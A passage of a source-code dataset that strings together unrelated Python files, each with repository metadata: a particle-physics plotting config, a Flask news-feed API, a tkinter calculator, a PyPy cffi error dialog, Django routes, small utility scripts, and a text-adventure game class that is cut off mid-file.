# for i in range(new_hist.GetN()):
# xbinsup[i] /= 1000.
# xbinsdo[i] /= 1000.
# return new_hist
#
# new_hist = hist
# props = sm.setup.properties
# if props:
# # Changes for MeV/GeV
# affected_dists = ["MEff", "MEff3", "MET", "mLL", "mTW", "pTB1", "pTB2", "pTJ3", "pTV", "mBB", "mBBJ"]
# if props["L"] == "1" and props["dist"] in affected_dists:
# new_hist = change_MeV_GeV(hist)
#
# return new_hist
def make_sum_plots (self, func):
#add MET for 0 lepton merged+resolved signal region
#add mBB for 0 mbbcr+SR
for tag_i in ["1", "2"] :
func("Region_BMax500_BMin0_incJet1_J2_T"+tag_i+"_L2_Y2015_distmBB_Dtopemucr",
rt=["_L2", "_T"+tag_i, "_distmBB", "_Dtopemucr"], ea=[])
func("Region_BMax500_BMin0_incJet1_J2_T"+tag_i+"_L2_Y2015_distmBB",
rt=["_L2", "_T"+tag_i, "_distmBB"], ea=["_Dtopemucr"])
func("Region_BMax500_BMin150_incJet1_J2_T"+tag_i+"_L0_Y2015_distmBB",
rt=["_L0", "_T"+tag_i, "_distmBB"], ea=[])
func("Region_BMin150_T"+tag_i+"_L0_Y2015_distMET_DSR",
rt=["_L0","_T"+tag_i, "_distMET","_DSR"], ea=["_L2","_DmBBcr","_Dtopemucr"])
func("Region_BMin0_T"+tag_i+"_L2_Y2015_distpTV_DSR",
rt=["_L2","_T"+tag_i, "_distpTV","_DSR"], ea=["_DmBBcr","_Dtopemucr"])
def get_run_info (self):
lumi = {}
if self._year == "4023":
lumi["2011"] = ["4.7", 7]
lumi["2012"] = ["20.3", 8]
if self._year == "2011":
lumi["2011"] = ["4.7", 7]
if self._year == "2012":
lumi["2012"] = ["20.3", 8]
if self._year == "2015":
lumi["2015"] = ["3.2", 13]
return lumi
def get_title_height (self):
return 3.5 if self._year == "4023" else 2
def draw_category_ids (self, props, l, pos, nf):
merged = False
plural_jets = False
nf += 0.25*nf # a bit more vertical spacing
nleps = props.get("L", "-100")
if nleps == '3':
nleps = "0+1+2"
njets = props.get("J", "-1")
nincjets = props.get("incJet", "-1")
if njets == "23":
plural_jets = True
njets = "2+3"
elif nincjets == '1':
plural_jets = True
# njets += '+'
njets = '#geq {}'.format(njets)
elif int(njets) > 1:
plural_jets = True
nfatjets = props.get("Fat", "-1")
nincfatjets = props.get("incFat", "-1")
if int(nfatjets) > 0 and nincfatjets == '1':
plural_jets = True
merged = True
# nfatjets += '+'
nfatjets = '#geq {}'.format(nfatjets)
# nfatjets += ' #leq'
elif int(nfatjets) > 1:
plural_jets = True
ntags = props.get("T", "-100")
region = ""
if not nleps == '-100':
if len(region) > 0:
region += ', '
region += "{} lep.".format(nleps)
if not njets == '-1' or not nfatjets == '-1':
if len(region) > 0:
region += ', '
region += "{} {}jet{}".format(nfatjets if merged else njets,
"large-R " if merged else "",
"s" if plural_jets else "")
if not ntags == '-100':
if len(region) > 0:
region += ', '
region += "{} tag{}".format(ntags,
"s" if not int(ntags) == 1 else "")
pTVBin = ""
pTVmin = props.get("BMin", "-999")
pTVmax = props.get("BMax", "-999")
if not pTVmin == "-999" and pTVmax == "-999" and not pTVmin == "0":
pTVBin = "{0} GeV #leq p_{{T}}^{{V}}".format(pTVmin)
elif (pTVmin == "0" or pTVmin == "-999") and not pTVmax == "-999":
pTVBin = "p_{{T}}^{{V}} < {0} GeV".format(pTVmax)
elif not pTVmin == "-999" and not pTVmax == "-999":
pTVBin = "{0} GeV #leq p_{{T}}^{{V}} < {1} GeV".format(pTVmin, pTVmax)
signalControl = props.get("D", "")
if not signalControl == "":
def add_strings (base, addition):
if base == "":
return addition
else:
return base + ", " + addition
temp = signalControl
signalControl = ""
reduce_SR_CR_mBB = props["dist"] == "pTV" or props["dist"] == "MET"
if temp.find('SR') == 0:
if reduce_SR_CR_mBB: signalControl = "m_{b#bar{b}} SR"
elif merged: signalControl = add_strings(signalControl, "75 GeV #leq m_{b#bar{b}} < 145 GeV")
else: signalControl = add_strings(signalControl, "110 GeV #leq m_{b#bar{b}} < 140 GeV")
temp = temp[2:]
if "highmBBcr" in temp:
if reduce_SR_CR_mBB: signalControl = "m_{b#bar{b}} upper CR"
elif merged: signalControl = add_strings(signalControl, "145 GeV #leq m_{b#bar{b}}")
else: signalControl = add_strings(signalControl, "140 GeV #leq m_{b#bar{b}}")
temp = temp.replace("highmBBcr", "")
if "lowmBBcr" in temp:
if reduce_SR_CR_mBB: signalControl = "m_{b#bar{b}} lower CR"
elif merged: signalControl = add_strings(signalControl, "m_{b#bar{b}} < 75 GeV")
else: signalControl = add_strings(signalControl, "m_{b#bar{b}} < 110 GeV")
temp = temp.replace("lowmBBcr", "")
if "mBBcr" in temp:
if reduce_SR_CR_mBB: signalControl = "m_{b#bar{b}} CR"
elif merged: signalControl = add_strings(signalControl, "m_{b#bar{b}} #leq 75 GeV, 145 GeV < m_{b#bar{b}}")
else: signalControl = add_strings(signalControl, "m_{b#bar{b}} #leq 110 GeV, 140 GeV < m_{b#bar{b}}")
temp = temp.replace("mBBcr", "")
if "topemucr" in temp:
signalControl = add_strings(signalControl, "e#mu")
temp = temp.replace("topemucr", "")
if "topaddbjetcr" in temp:
signalControl = add_strings(signalControl, "+1 b-jet")
temp = temp.replace("topaddbjetcr", "")
pos_next = pos[1] - 0.1*nf # a bit more spacing
l.DrawLatex(pos[0], pos_next, region)
if not pTVBin == "":
pos_next -= nf
l.DrawLatex(pos[0], pos_next, pTVBin)
if not signalControl == "":
pos_next -= nf
l.DrawLatex(pos[0], pos_next, signalControl)
pos_next -= nf
return (pos[0], pos_next)
def force_mu_value (self):
return self.force_mu
def get_year_str (self):
return self._year if int(self._year) < 2015 else ""
def get_xbound_from_properties (self, prop):
return (40, 400) if prop["dist"] == "pTB1" else None
def get_legend_pos_from_properties (self, prop):
result = None
if prop["L"] == '0' and prop["dist"] == "VpT":
result = [0.155, 0.13, 0.375, 0.65]
if prop["dist"] == "dPhiVBB":
result = [0.16, 0.16, 0.38, 0.68]
return result
def get_yscale_factor_from_properties (self, prop, logy):
# if prop["dist"] == "MV1cB1" or prop["dist"] == "MV1cB2" or prop["dist"] == "MV1cBTag":
# if not logy: return 1.5
# if prop["dist"] == "dPhiVBB" :
# if logy: return 5
# else : return 0.7
# if prop["dist"] == "dPhiLBmin" :
# if not logy: return 1.3
# if prop["dist"] == "mjj" :
# if not logy: return 1.1
# if prop["dist"] == "dRBB" :
# if logy: return 500
# if prop["dist"] == "MV1cBTag" :
# if not logy: return 0.75
# if prop["L"] == "0" :
# if prop["dist"] == "MV1cB1" or prop["dist"] == "MV1cB2" or prop["dist"] == "mjj" :
# if not logy: return 1.1
# if prop["dist"] == "MET" :
# if not logy: return 1.0/1.15
return 1.0
def postprocess_main_content_histogram (self, prop, hist):
# draw line denoting the transition of merged and resolved
if prop["dist"] == "MET" or prop["dist"] == "pTV":
max_value = hist.GetMaximum()
min_value = 0#hist.GetYaxis().GetXmin()
x_value = hist.GetXaxis().GetBinLowEdge(hist.GetXaxis().FindBin(500))
l = ROOT.TLine(x_value, min_value, x_value, max_value)
l.SetLineStyle(2)
l.SetLineWidth(4)
l.SetNDC(False)
l.DrawLine(x_value, min_value, x_value, max_value)
logging.debug("drawing line with endpoint coordinates ({},{}) and ({},{})".format(x_value, min_value, x_value, max_value))
return hist
def get_xTitle (self, prop, data_hist):
""" get title of X-axis from properties """
if not prop:
return ""
varname = prop["dist"]
result = varname
labels = {
# new
"MV1cB1": "MV1c(b_{1}) OP",
"MV1cB2": "MV1c(b_{2}) OP",
"MV1cBTag": "MV1c(b) OP",
"dEtaBB": "#Delta#eta(b_{1},b_{2})",
"dEtaVBB": "#Delta#eta(V,bb)",
"dPhiLBmin": "#Delta#phi(lep,b)_{min}",
"dPhiVBB": "#Delta#phi(V,bb)",
"dRBB": "#DeltaR(b_{1},b_{2})",
#"MEff": "M_{eff} [GeV]",
#"MEff3": "M_{eff3} [GeV]",
"MEff": "H_{T} [GeV]",
"MEff3": "H_{T} [GeV]",
"MET": "E_{T}^{miss} [GeV]",
"mLL": "M_{ll} [GeV]",
"mTW": "m_{T}(W) [GeV]",
"mva": "BDT_{VH}",
"mvaVZ": "BDT_{VZ}",
"pTB1": "p_{T}(b_{1}) [GeV]",
"pTB2": "p_{T}(b_{2}) [GeV]",
"pTJ3": "p_{T}(j_{3}) [GeV]",
"pTV": "p_{T}^{V} [GeV]",
"VpT": "p_{T}^{V} [GeV]",
"mVH": "m_{T}(Vh) [GeV]"
}
if "mjj" in varname:
# nominal
tmp_extra = ""
tmp_extra2 = " [GeV]"
# hack for mjj trafo D
#tmp_extra = "Transformed "
#tmp_extra2 = ""
#
if prop["T"] == "2":
result = tmp_extra+"m_{bb}"+tmp_extra2
elif prop["T"] == "1":
result = tmp_extra+"m_{bj}"+tmp_extra2
else:
result = tmp_extra+"m_{jj}"+tmp_extra2
elif "mBBJ" in varname:
if prop["T"] == "2":
result = "m_{bbj} [GeV]"
elif prop["T"] == "1":
result = "m_{bjj} [GeV]"
else:
result = "m_{jjj} [GeV]"
elif "mBB" in varname:
if prop["T"] == "2":
result = "m_{bb} [GeV]"
elif prop["T"] == "1":
result = "m_{bj} [GeV]"
else:
result = "m_{jj} [GeV]"
elif "mVH" in varname:
if prop["L"] == "1" or prop["L"] == "0":
result = "m_{T}(Vh) [GeV]"
else:
result = "m(Vh) [GeV]"
elif varname in labels:
result = labels[varname]
#for k in labels:
#if k in varname:
#return labels[k]
return result
def get_yTitle_tag (self, prop, data_hist):
extra_unit = ""
if prop["dist"] == "MEff" : extra_unit = " GeV"
if prop["dist"] == "MEff3" : extra_unit = " GeV"
if prop["dist"] == "MET" : extra_unit = " GeV"
if prop["dist"] == "mLL" : extra_unit = " GeV"
if prop["dist"] == "mTW" : extra_unit = " GeV"
if prop["dist"] == "pTB1" : extra_unit = " GeV"
if prop["dist"] == "pTB2" : extra_unit = " GeV"
if prop["dist"] == "pTJ3" : extra_unit = " GeV"
if prop["dist"] == "pTV" : extra_unit = " GeV"
#if prop["dist"] == "VpT" : extra_unit = " GeV" # new
if prop["dist"] == "mjj" : extra_unit = " GeV" # hack -> comment when trafoD
if prop["dist"] == "mBB" : extra_unit = " GeV"
if prop["dist"] == "mBBJ" : extra_unit = " GeV"
if prop["dist"] == "mVH" : extra_unit = " GeV"
# NOTE: JWH - ED board requests
if not self.do_rebinning(prop):
# if not (prop["dist"] == "mVH" and prop.get("incFat", "-1") == "-1" and
# prop.get("D", "") == "SR" and prop.get("L", "0") == "2") :
extra_number = str(data_hist.GetBinWidth(1))
if not extra_number.find('.') == -1: extra_number = extra_number[:extra_number.find('.')]
extra_unit = " " + extra_number + extra_unit
y_ratio = round(data_hist.GetBinWidth(1), 2)
if (y_ratio*10) % 10 == 0 and (y_ratio*100) % 100 == 0: y_ratio = int(y_ratio)
if prop["dist"] == "VpT": extra_str = " / bin" # new
elif prop["dist"] == "mVH": extra_str = " /" + extra_unit
else: extra_str = " / " + str(y_ratio) + extra_unit # new
if prop["dist"] == "MV1cB1": extra_str = ""
if prop["dist"] == "MV1cB2": extra_str = ""
if prop["dist"] == "MV1cBTag": extra_str = ""
return extra_str
def set_y_range (self, hist, nlegend_items, miny, maxy, log_scale, prop):
# if log_scale and prop["dist"] == "mVH":
# hist.SetMaximum(maxy * 100)
# hist.SetMinimum(0.001)
# return
bottom_padding = 1.0/16.0
content_faction = 4.0/7.0 if nlegend_items <= 8 else 3.0/7.0
if prop["dist"] == "mVH":
# figures 2)a-d in conf note
if (prop["L"] == "0" or prop["L"] == "2") and log_scale:
if prop["T"] == "1" or prop["T"] == "2":
if prop["D"] == "mBBcr":
if prop.get("BMax", "-999") == "500":
content_faction *= 1.25
# figures 3)a,b in conf note
if prop["D"] == "topemucr" and log_scale:
if prop["T"] == "1":
content_faction *= 1.15
if prop["T"] == "2":
content_faction *= 1.25
if "SR" in prop["D"]:
# figures 6)a-d in conf note
if prop.get("BMax", "-999") == "500" and log_scale:
if prop["L"] == "0":
if prop["T"] == "1":
content_faction *= 1.15
if prop["T"] == "2":
content_faction *= 1.25
if prop["L"] == "2":
content_faction *= 1.25
# figures 7)a,c,d in conf note
if prop.get("BMin", "-999") == "500" and not log_scale:
if prop["L"] == "0":
if prop["T"] == "1":
content_faction *= 1.5
if prop["L"] == "2":
if prop["T"] == "1":
content_faction *= 2.15
if prop["T"] == "2":
content_faction *= 1.15
# figures 4)a-d in conf note
if prop["dist"] == "mBB" and not log_scale:
if prop.get("BMax", "-999") == "500" and not (prop.get("D", "") == "topemucr"):
# if prop["L"] == "0":
# if prop["T"] == "1":
content_faction *= 1.5
if prop.get("BMax", "-999") == "500" and prop.get("D", "") == "topemucr":
content_faction *= 1.15
# figures 10)a-d in conf note
if (prop["dist"] == "MET" or prop["dist"] == "pTV") and log_scale:
content_faction *= 1.25
if not log_scale:
if miny < 1e-6: miny = 0
plot_scale = (maxy - miny)
bottom = miny - bottom_padding*plot_scale
top = bottom + plot_scale/content_faction
# hist.SetMinimum(bottom)
# hist.SetMaximum(top)
hist.GetYaxis().SetLimits(bottom, top)
# hist.GetHistogram().GetYaxis().SetRangeUser(bottom, top)
logging.debug("setting plot y-range to ({0}, {1})".format(hist.GetHistogram().GetYaxis().GetXmin(), hist.GetHistogram().GetYaxis().GetXmax()))
return
else:
log_miny = ROOT.TMath.Log10(miny)
log_maxy = ROOT.TMath.Log10(maxy)
plot_scale = (log_maxy - log_miny)
# 0.25 is just fine tuning
# bottom = log_miny - 0.25*bottom_padding*plot_scale
bottom = log_miny
top = bottom + plot_scale/content_faction
# hist.SetMinimum(ROOT.TMath.Power(10, bottom))
# hist.SetMaximum(ROOT.TMath.Power(10, top))
hist.GetYaxis().SetLimits(ROOT.TMath.Power(10, bottom), ROOT.TMath.Power(10, top))
# hist.GetHistogram().GetYaxis().SetRangeUser(ROOT.TMath.Power(10, bottom), ROOT.TMath.Power(10, top))
logging.debug("setting log scale plot y-range to ({0}, {1})".format(hist.GetHistogram().GetYaxis().GetXmin(), hist.GetHistogram().GetYaxis().GetXmax()))
return
# if not log_scale and miny > 0:
# miny = 0
# if log_scale and miny <= 1:
# miny = 0.25
# mini = miny
#
# if mini < 0:
# hist.SetMinimum(mini*1.25)
# else:
# mini = 0
# # fix 0 cut in the Y axis
# #hist.SetMinimum(0.01)
# if log_scale:
# hist.SetMaximum(maxy * 100)
# hist.SetMinimum(miny / 2.5)
# else:
# hist.SetMaximum(mini + (maxy - mini) * 1.5)
def auto_compute_ratio_yscale_from_properties (self, prop):
return (prop["dist"] == "mva" or prop["dist"] == "mvaVZ")
def scale_all_yvals(self, prop):
return prop["dist"] == "mva", 0.05
def postprocess_dataMC_ratio_histogram (self, prop, hist):
return hist
def determine_year_from_title (self, title):
if "2015" in title:
return "2015"
elif "2012" in title:
return "2012"
elif "2011" in title:
return "2011"
elif "both" in title:
return "4023"
def add_additional_signal_info_to_legend (self, legend, signal):
if signal.mode == self._STACK:
legend.AddEntry(ROOT.NULL, "m_{H}=" + str(signal.mass) + " GeV", "")
else:
legend.AddEntry(ROOT.NULL, "m_{H}=" + str(signal.mass) + " GeV", "")
| btannenw/physics-dihiggs | statCode/scripts/VHbbRun2/analysisPlottingConfig.py | analysisPlottingConfig.py | py | 30,133 | python | en | code | 1 | github-code | 36 |
73412902183 | from flask import Flask, jsonify, redirect
import feedparser
app = Flask(__name__)
# Function grabs the rss feed headlines (titles) and returns them as a list
def getHeadlines( rss_url ):
headlines = []
feed = feedparser.parse( rss_url )
for newsitem in feed['items']:
headlines.append(newsitem['title'])
headlines.append(newsitem['link'])
return headlines
@app.route('/', methods=['GET'])
def home():
return '''<h1>Welcome to News Feeder API</h1>
<p>A prototype API for national and international news feed getter.</p>'''
@app.route('/resources/documentation', methods=['GET'])
def documentation():
return redirect('https://app.swaggerhub.com/apis/daffaadevvv/NewsFeederAPI/1.0.0', code = 303)
@app.route('/resources/news/internasional', methods=['GET'])
def indexinter():
# A list to hold all headlines
allinterheadlines = []
# List of RSS feeds that we will fetch and combine
newsinturls = {
'rtnews': 'https://www.rt.com/rss/',
'googlenews': 'https://news.google.com/news/rss/?hl=en&ned=us&gl=US'
}
# Iterate over the feed urls
for key,url in newsinturls.items():
# Call getHeadlines() and combine the returned headlines with allheadlines
allinterheadlines.extend( getHeadlines( url ) )
print(allinterheadlines)
return jsonify(allinterheadlines)
@app.route('/resources/news/dalamnegeri', methods=['GET'])
def indexnat():
# A list to hold all headlines
allnatheadlines = []
# List of RSS feeds that we will fetch and combine
newsnaturls = {
'republikanews': 'https://www.republika.co.id/rss',
'detiknews': 'http://rss.detik.com/index.php/detikcom'
}
# Iterate over the feed urls
for key,url in newsnaturls.items():
# Call getHeadlines() and combine the returned headlines with allheadlines
allnatheadlines.extend( getHeadlines( url ) )
print(allnatheadlines)
return jsonify(allnatheadlines)
if __name__ == '__main__':
app.run(debug = True) | daffaadevvv/StudyGit | newsfeederapi.py | newsfeederapi.py | py | 2,102 | python | en | code | 0 | github-code | 36 |
42511308205 | #Simple Calculator using tkinter
#by saty035
from tkinter import* #GUI toolkit
#entering numbers
def btnClick(numbers):
global operator
operator = operator + str(numbers)
text_input.set(operator)
#Clearing the screen
def btnClearDisplay():
global operator
operator=''
text_input.set("")
#resulting output
def btnEql():
global operator
sumup=str(eval(operator))
text_input.set(sumup)
operator=''
cal=Tk()
cal.title("Calculator by saty035") #title
operator=""
text_input=StringVar()
#screen
txtDisplay=Entry(cal,font=('ariel',20,'bold'), textvariable=text_input,bd=30,insertwidth=4,bg='pink',justify='right').grid(columnspan=4)
#buttons and operators
btn7=Button(cal,padx=16,bd=8,fg='black',font=('ariel',20,'bold'),text='7',command=lambda:btnClick(7),bg='powder blue').grid(row=1,column=0)
btn8=Button(cal,padx=16,bd=8,fg='black',font=('ariel',20,'bold'),text='8',command=lambda:btnClick(8),bg='powder blue').grid(row=1,column=1)
btn9=Button(cal,padx=16,bd=8,fg='black',font=('ariel',20,'bold'),text='9',command=lambda:btnClick(9),bg='powder blue').grid(row=1,column=2)
addition=Button(cal,padx=16,bd=8,fg='black',font=('ariel',20,'bold'),text='+',command=lambda:btnClick('+'),bg='powder blue').grid(row=1,column=3)
btn4=Button(cal,padx=16,bd=8,fg='black',font=('ariel',20,'bold'),text='4',command=lambda:btnClick(4),bg='powder blue').grid(row=2,column=0)
btn5=Button(cal,padx=16,bd=8,fg='black',font=('ariel',20,'bold'),text='5',command=lambda:btnClick(5),bg='powder blue').grid(row=2,column=1)
btn6=Button(cal,padx=16,bd=8,fg='black',font=('ariel',20,'bold'),text='6',command=lambda:btnClick(6),bg='powder blue').grid(row=2,column=2)
subtraction=Button(cal,padx=16,bd=8,fg='black',font=('ariel',20,'bold'),text='-',command=lambda:btnClick('-'),bg='powder blue').grid(row=2,column=3)
btn1=Button(cal,padx=16,bd=8,fg='black',font=('ariel',20,'bold'),text='1',command=lambda:btnClick(1),bg='powder blue').grid(row=3,column=0)
btn2=Button(cal,padx=16,bd=8,fg='black',font=('ariel',20,'bold'),text='2',command=lambda:btnClick(2),bg='powder blue').grid(row=3,column=1)
btn3=Button(cal,padx=16,bd=8,fg='black',font=('ariel',20,'bold'),text='3',command=lambda:btnClick(3),bg='powder blue').grid(row=3,column=2)
multiplication=Button(cal,padx=16,bd=8,fg='black',font=('ariel',20,'bold'),text='*',command=lambda:btnClick('*'),bg='powder blue').grid(row=3,column=3)
btn0=Button(cal,padx=16,pady=16,bd=8,fg='black',font=('ariel',20,'bold'),text='0',command=lambda:btnClick(0),bg='powder blue').grid(row=4,column=0)
clr=Button(cal,padx=16,pady=16,bd=8,fg='black',font=('ariel',20,'bold'),text='C',bg='powder blue',command=btnClearDisplay).grid(row=4,column=1)
eql=Button(cal,padx=16,pady=16,bd=8,fg='black',font=('ariel',20,'bold'),text='=',bg='powder blue',command=btnEql).grid(row=4,column=2)
division=Button(cal,padx=16,pady=16,bd=8,fg='black',font=('ariel',20,'bold'),text='/',command=lambda:btnClick('/'),bg='powder blue').grid(row=4,column=3)
#mainloop
cal.mainloop() | saty035/100-Days-Of-Code-with-Python | Day 5/Calculator.py | Calculator.py | py | 3,101 | python | en | code | 1 | github-code | 36 |
43296847454 | # for Windows only
import sys
from rpython.rlib import jit
from rpython.rtyper.lltypesystem import lltype, rffi
from rpython.translator.tool.cbuild import ExternalCompilationInfo
MESSAGEBOX = sys.platform == "win32"
MODULE = r"""
#include <Windows.h>
#pragma comment(lib, "user32.lib")
static void *volatile _cffi_bootstrap_text;
RPY_EXTERN int _cffi_errorbox1(void)
{
return InterlockedCompareExchangePointer(&_cffi_bootstrap_text,
(void *)1, NULL) == NULL;
}
static DWORD WINAPI _cffi_bootstrap_dialog(LPVOID ignored)
{
Sleep(666); /* may be interrupted if the whole process is closing */
MessageBoxA(NULL, (char *)_cffi_bootstrap_text,
"PyPy: Python-CFFI error",
MB_OK | MB_ICONERROR);
_cffi_bootstrap_text = NULL;
return 0;
}
RPY_EXTERN void _cffi_errorbox(char *text)
{
/* Show a dialog box, but in a background thread, and
never show multiple dialog boxes at once. */
HANDLE h;
_cffi_bootstrap_text = text;
h = CreateThread(NULL, 0, _cffi_bootstrap_dialog,
NULL, 0, NULL);
if (h != NULL)
CloseHandle(h);
}
"""
if MESSAGEBOX:
eci = ExternalCompilationInfo(
separate_module_sources=[MODULE],
post_include_bits=["RPY_EXTERN int _cffi_errorbox1(void);\n"
"RPY_EXTERN void _cffi_errorbox(char *);\n"])
cffi_errorbox1 = rffi.llexternal("_cffi_errorbox1", [],
rffi.INT, compilation_info=eci)
cffi_errorbox = rffi.llexternal("_cffi_errorbox", [rffi.CCHARP],
lltype.Void, compilation_info=eci)
class Message:
def __init__(self, space):
self.space = space
self.text_p = lltype.nullptr(rffi.CCHARP.TO)
def start_error_capture(self):
ok = cffi_errorbox1()
if rffi.cast(lltype.Signed, ok) != 1:
return None
return self.space.appexec([], """():
import sys
class FileLike:
def write(self, x):
try:
of.write(x)
except:
pass
self.buf += x
fl = FileLike()
fl.buf = ''
of = sys.stderr
sys.stderr = fl
def done():
sys.stderr = of
return fl.buf
return done
""")
def stop_error_capture(self, w_done):
if w_done is None:
return
w_text = self.space.call_function(w_done)
p = rffi.str2charp(self.space.bytes_w(w_text),
track_allocation=False)
if self.text_p:
rffi.free_charp(self.text_p, track_allocation=False)
self.text_p = p # keepalive
cffi_errorbox(p)
@jit.dont_look_inside
def start_error_capture(space):
msg = space.fromcache(Message)
return msg.start_error_capture()
@jit.dont_look_inside
def stop_error_capture(space, x):
msg = space.fromcache(Message)
msg.stop_error_capture(x)
else:
def start_error_capture(space):
return None
def stop_error_capture(space, nothing):
pass
| mozillazg/pypy | pypy/module/_cffi_backend/errorbox.py | errorbox.py | py | 3,429 | python | en | code | 430 | github-code | 36 |
30993271589 | from django.urls import path
from myproject.apps.board import views
urlpatterns = [
# path('boards/', views.boards, name='all_boards'),
path('boards/', views.BoardsView.as_view(), name='all_boards'),
# topic
path('board/<int:pk>/topics', views.topics, name='all_topics'),
path('board/<int:pk>/topics/new', views.new_topic, name='new_topic'),
# post
path('board/<int:pk>/topic/<int:topic_pk>/posts', views.posts, name='all_posts'),
path('board/<int:pk>/topic/<int:topic_pk>/posts/new', views.new_post, name='new_post'),
# path('board/<int:pk>/topic/<int:topic_pk>/posts/edit',views.PostUpdateView.as_view())
# url(r'^board/(?P<pk>\d+)/topics/(?P<topic_pk>\d+)/posts/(?P<post_pk>\d+)/edit/$',
# boards_views.PostUpdateView.as_view(), name='edit_post'),
]
| SunA0/django_learn | myproject/apps/board/urls.py | urls.py | py | 811 | python | en | code | 0 | github-code | 36 |
23443224445 | from .utils import display_table, read_sold, str_to_date
def show_sold(start_date, end_date):
start_date, end_date = str_to_date(start_date), str_to_date(end_date)
header, data = read_sold()
sold_in_this_time = []
for row in data:
sold_date = str_to_date(row[-1])
if start_date <= sold_date <= end_date:
sold_in_this_time.append(row)
title = f"Sold Products (from {start_date} to {end_date})"
display_table(title, header, sold_in_this_time)
| sndr157/Inventory | modules/sold.py | sold.py | py | 459 | python | en | code | 0 | github-code | 36 |
33329719512 | #!/bin/env python
import json
import helpers
if __name__ == '__main__':
root_dir = helpers.root_dir()
path = "%s/sources/counties.geojson" % root_dir
print("loading %s" % path)
file = open(path, 'rb')
geojson = json.load(file)
data = {}
for feature in geojson["features"]:
props = feature["properties"]
geoid = props["GEOID"]
name = props["NAME"]
data[geoid] = name
path = "%s/data/counties.json" % root_dir
print("saving %s" % path)
file = open(path, 'wb')
json.dump(data, file, sort_keys=True)
| knightmirnj/acluedtool | counties.py | counties.py | py | 524 | python | en | code | 0 | github-code | 36 |
72749247463 | import json
import gamestate
from enum import Enum
from typing import List, Dict
import city
import items
import time
from main_menu import GAME_WIDTH, dotted_line, empty_line, print_in_the_middle, print_left_indented, write_over, \
go_up_and_clear, yes_no_selection, clear_screen, informScreen
from narration import narration, left_narration
import puzzles
class GameAction(gamestate.GameState):
def __init__(self, game_state: gamestate.GameState):
self.game_state = game_state
@property
# Get map_arr
def map_arr(self) -> [city.District]:
return self.game_state._map_arr
# Set map_arr
def set_map_arr(self, map_arr: [city.District]):
self.game_state._map_arr = map_arr
@property
# Return turns remaining
def turns_remaining(self) -> int:
return self.game_state._turns_remaining
# Decrement turns remaining
def decrement_turns_remaining(self) -> None:
self.game_state._turns_remaining -= 1
@property
# Return current location
def current_location(self) -> str:
return self.game_state._current_location
# Check if lair has been discovered
def lair_discovered(self) -> bool:
return self.game_state._current_location == self.game_state._lair_location and self.game_state._vision_orb == True
# Change location
def change_location(self, new_location: str) -> int:
valid_location = False
new_location = new_location.lower()
if new_location in gamestate.District.__members__:
valid_location = True
if valid_location:
self.game_state._current_location = gamestate.District[new_location].name
return 0
else:
return 1
# Check legendary items collected
def check_legendary(self) -> [str]:
legendary_status = [None] * 4
legend_list = [ (self.game_state._vision_orb, "Vision Orb"),
(self.game_state._strength_orb, "Strength Orb"),
(self.game_state._vitality_orb, "Vitality Orb"),
(self.game_state._magic_sword, "Magic Sword") ]
for i in range(len(legend_list)):
if legend_list[i][0]:
if self.check_inventory_by_name(legend_list[i][1]):
legendary_status[i] = "On Hand"
else:
legendary_status[i] = "Found "
else:
legendary_status[i] = "Unknown"
return legendary_status
@property
# Return inventory
def current_inventory(self) -> List[items.Item]:
return self.game_state._current_inventory
# Check if there's space in inventory
def space_in_inventory(self) -> bool:
return len(self.current_inventory) < gamestate.MAX_INVENTORY
# Add item to inventory
def add_to_inventory(self, new_item: items.Item) -> int:
valid_item = True
if len(self.game_state._current_inventory) >= gamestate.MAX_INVENTORY:
valid_item = False
elif (True): # TODO: validate item
pass
if valid_item:
self.game_state._current_inventory.append(new_item)
return 0
else:
return 1
# Remove item from inventory
def remove_from_inventory(self, item_to_remove: items.Item) -> int:
if item_to_remove in self.game_state._current_inventory:
self.game_state._current_inventory.remove(item_to_remove)
return 0
else:
return 1
# Check if item exists in inventory
def check_inventory(self, item: items.Item) -> bool:
if item in self.game_state._current_inventory:
return True
return False
# Check if item exists in inventory by name
def check_inventory_by_name(self, item_name: str) -> bool:
for i in range(len(self.game_state._current_inventory)):
if item_name == self.game_state._current_inventory[i].name:
return True
return False
# Get item from inventory by name
def get_item_from_inventory_by_name(self, item_name: str) -> items.Item:
for item in self.game_state._current_inventory:
if item.name.lower() == item_name.lower():
return item
# Remove item from inventory
def remove_item_from_inventory(self, item: items.Item):
self.game_state._current_inventory.remove(item)
# Remove item from inventory by name
def remove_item_from_inventory_by_name(self, item_name: str):
item_index = None
for i in range(len(self.game_state._current_inventory)):
if self.game_state._current_inventory[i].name.lower() == item_name.lower():
item_index = i
break
del self.game_state._current_inventory[item_index]
# Get item from uncollected_legendary_items array by name
def get_item_from_uncollected_legendary_items(self, item_name: str) -> items.Item:
for item in self.game_state.uncollected_legendary_items:
if item.name == item_name:
return item
# Remove item from uncollected_legendary_items array by name
def remove_item_from_uncollected_legendary_items(self, item_name: str):
item_index = None
for i in range(len(self.game_state.uncollected_legendary_items)):
if self.game_state.uncollected_legendary_items[i].name == item_name:
item_index = i
break
del self.game_state.uncollected_legendary_items[item_index]
@property
# Return obtained clues in an ascending order by clue_id
def obtained_clues(self) -> [str]:
return self.game_state._obtained_clues
# Add clue to obtained clues
def add_to_obtained_clues(self, clue_text: str):
self.game_state._obtained_clues.append(clue_text)
# Check if district has been visited
def check_visited(self, district_name: str) -> bool:
district_name = district_name.lower()
if district_name in gamestate.District.__members__:
proper_name = gamestate.District[district_name].name
return self.game_state._visited[proper_name]
else:
raise ValueError("A bad district_name was supplied.")
# Change district to visited
def change_visited(self, district_name: str) -> int:
district_name = district_name.lower()
if district_name in gamestate.District.__members__:
proper_name = gamestate.District[district_name].name
self.game_state._visited[proper_name] = True
return 0
else:
return 1
def enter_lair_confirmation(self) -> int:
msg1 = "Are you sure you want to continue into the Lair?"
msg2 = "Once you've entered, there's no going back!"
clear_screen()
dotted_line(GAME_WIDTH)
empty_line(1)
print_in_the_middle(GAME_WIDTH, msg1)
print_in_the_middle(GAME_WIDTH, msg2)
empty_line(1)
dotted_line(GAME_WIDTH)
selection = yes_no_selection(input("Yes/No >>> "))
return selection
def narration_screen(self, narr):
clear_screen()
dotted_line(GAME_WIDTH)
empty_line(2)
narration(narr, GAME_WIDTH)
empty_line(2)
dotted_line(GAME_WIDTH)
input("Press [Enter] to continue...")
clear_screen()
# Dr. Crime's lair final game sequence
def final_game_sequence(self) -> str:
number_of_tries = 8
story1 = "You've entered the lair and encountered Dr. Crime. There are " + str(len(self.game_state.boss_puzzles))+ " puzzles " \
"you must solve. You must answer all puzzles correctly in order to defeat Dr. Crime and win the game. " \
"And you are only be allowed " + str(number_of_tries) + " wrong answer tries."
